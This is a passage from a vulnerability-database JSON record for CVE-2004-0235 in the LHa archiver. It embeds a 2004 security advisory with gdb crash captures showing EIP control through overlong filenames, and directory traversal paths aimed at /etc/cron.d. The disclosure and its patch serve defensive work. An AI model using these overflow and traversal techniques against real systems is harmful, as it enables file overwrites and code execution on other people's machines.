Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $
b) two directory traversal problems
LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil".
- ATTACHED FILES *
I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives.
- TIMELINE *
18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory
// Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0141",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lha",
"scope": "eq",
"trust": 1.6,
"vendor": "tsugio okamoto",
"version": "1.17"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.6,
"vendor": "tsugio okamoto",
"version": "1.15"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.6,
"vendor": "tsugio okamoto",
"version": "1.14"
},
{
"model": "winzip",
"scope": "eq",
"trust": 1.3,
"vendor": "winzip",
"version": "9.0"
},
{
"model": "cgpmcafee",
"scope": "eq",
"trust": 1.3,
"vendor": "stalker",
"version": "3.2"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "3.0"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "2.4"
},
{
"model": "winrar",
"scope": "eq",
"trust": 1.3,
"vendor": "rarlab",
"version": "3.20"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.32"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.31"
},
{
"model": "f-secure for firewalls",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.20"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.13"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.11"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.10"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.8"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.7"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.5"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.4"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.2"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.1"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.0"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "fedora core",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "core_1.0"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "1.14i-9"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.0,
"vendor": "clearswift",
"version": "4.3.6_sp1"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.5"
},
{
"model": "lha for unix",
"scope": "lte",
"trust": 0.8,
"vendor": "lha for unix",
"version": "1.17"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (ws)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "9"
},
{
"model": "linux advanced workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1"
},
{
"model": "linux i686",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "lha-1.14i-9.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "hat fedora core1",
"scope": null,
"trust": 0.3,
"vendor": "red",
"version": null
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.17"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.15"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.14"
},
{
"model": "webshield smtp",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "webshield appliances",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan professional",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan for netapp",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise i",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan command line",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "9.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0.3"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "3.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "1.0"
},
{
"model": "virex",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "securityshield for microsoft isa server",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "portalshield for microsoft sharepoint",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "netshield for netware",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "managed virusscan",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "linuxshield",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for mail servers with epo",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for lotus domino",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.5"
},
{
"model": "asap virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "active virus defense smb edition",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active threat protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active mail protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for samba servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "anti-virus for ms exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.50"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "mailsweeper sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.18"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.17"
},
{
"model": "networks barracuda spam firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.03.022"
}
],
"sources": [
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lha_for_unix_project:lha_for_unix",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ulf Harnhammar\u203b ulfh@update.uu.se\u203bJean-S\u00e9bastien Guay-Leroux\u203b jean-sebastien@guay-leroux.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0235",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2004-0235",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-8665",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-0235",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2004-0235",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-176",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-8665",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\"). \nThe first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. \nThe second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. \n**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. \n**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------\n\nLHa buffer overflows and directory traversal problems\n\nPROGRAM: LHa (Unix version)\nVENDOR: various people\nVULNERABLE VERSIONS: 1.14d to 1.14i\n 1.17 (Linux binary)\n possibly others\nIMMUNE VERSIONS: 1.14i with my patch applied\n 1.14h with my patch applied\nLHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm\n http://www2m.biglobe.ne.jp/~dolphin/lha/prog/\nLHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/\nREFERENCES: CAN-2004-0234 (buffer overflows)\n CAN-2004-0235 (directory traversal)\n\n* DESCRIPTION *\n\nLHa is a console-based program for packing and unpacking LHarc\narchives. \n\nIt is one of the packages in Red Hat Linux, Fedora Core, SUSE\nLinux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,\nGentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. \nIt is also included in the port/package collections for FreeBSD,\nOpenBSD and NetBSD. \n\n* OVERVIEW *\n\nLHa has two stack-based buffer overflows and two directory traversal\nproblems. They can be abused by malicious people in many different\nways: some mail virus scanners require LHa and run it automatically\non attached files in e-mail messages. Some web applications allow\nuploading and unpacking of LHarc archives. Some people set up their\nweb browsers to start LHa automatically after downloading an LHarc\narchive. Finally, social engineering is probably quite effective\nin this case. \n\n* TECHNICAL DETAILS *\n\na) two stack-based buffer overflows\n\nThe buffer overflows in LHa occur when testing (t) or extracting\n(x) archives where the archive contents have too long filenames\nor directory names. The cause of the problem is the function\nget_header() in header.c. This function first reads the lengths of\nfilenames or directory names from the archive, and then it reads\nthat many bytes to a char array (one for filenames and one for\ndirectory names) without checking if the array is big enough. \n\nBy exploiting this bug, you get control over several registers\nincluding EIP, as you can see in this session capture:\n\n$ lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ gdb lha\nGNU gdb Red Hat Linux (5.3post-0.20021129.18rh)\nCopyright 2003 Free Software Foundation, Inc. \nGDB is free software, covered by the GNU General Public License, and\nyou are welcome to change it and/or distribute copies of it under\ncertain conditions. \nType \"show copying\" to see the conditions. \nThere is absolutely no warranty for GDB. Type \"show warranty\" for\ndetails. \nThis GDB was configured as \"i386-redhat-linux-gnu\"... \n(gdb) r x buf_oflow.lha\nStarting program: /usr/bin/lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffdd50 0xbfffdd50\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210282 2163330\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) r t buf_oflow.lha\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) 